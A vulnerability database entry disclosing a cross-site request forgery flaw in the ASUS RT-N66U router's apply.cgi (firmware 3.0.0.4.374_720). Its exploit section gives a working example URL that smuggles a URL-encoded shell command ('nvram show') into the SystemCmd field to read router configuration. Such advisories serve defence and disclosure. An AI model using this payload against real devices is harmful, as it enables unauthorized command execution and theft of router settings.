Details of VAR-E-201309-0005

ID

VAR-E-201309-0005

TITLE

ASUS RT-N66U 'apply.cgi' Cross Site Request Forgery Vulnerability

Trust: 0.3

sources: BID: 62726

DESCRIPTION

ASUS RT-N66U is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
ASUS RT-N66U 3.0.0.4.374_720 is vulnerable; other versions may also be affected.

Trust: 0.3

sources: BID: 62726

AFFECTED PRODUCTS

vendor:

asus

model:

rt-n66u 3.0.0.4.374 720

scope:

version:

Trust: 0.3

sources: BID: 62726

EXPLOIT

To exploit the issue an attacker must entice a user into visiting a malicious site.
The following example URL is available:
http://www.example.com/apply.cgi?current_page=Main_Analysis_Content.asp&next_page=cmdRet_check.htm&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=%6e%76%72%61%6d%20%73%68%6f%77&firmver=3.0.0.4&cmdMethod=ping&destIP=www.example1.com&pingCNT=5

Trust: 0.3

sources: BID: 62726

PRICE

Free

Trust: 0.3

sources: BID: 62726

TYPE

Input Validation Error

Trust: 0.3

sources: BID: 62726

CREDITS

cgcai

Trust: 0.3

sources: BID: 62726

EXTERNAL IDS

db:

BID

id:

62726

Trust: 0.3

sources: BID: 62726

REFERENCES

url:	https://www.qxcg.net/arbitrary-command-execution-on-an-asus-rtn66u.html	Trust: 0.3
url:	http://www.asus.com/networking/rtn66u/	Trust: 0.3

sources: BID: 62726

SOURCES

db:

BID

id:

62726

LAST UPDATE DATE

2022-07-27T09:21:57.584000+00:00

SOURCES UPDATE DATE

db:

BID

id:

62726

date:

2013-09-30T00:00:00

SOURCES RELEASE DATE

db:

BID

id:

62726

date:

2013-09-30T00:00:00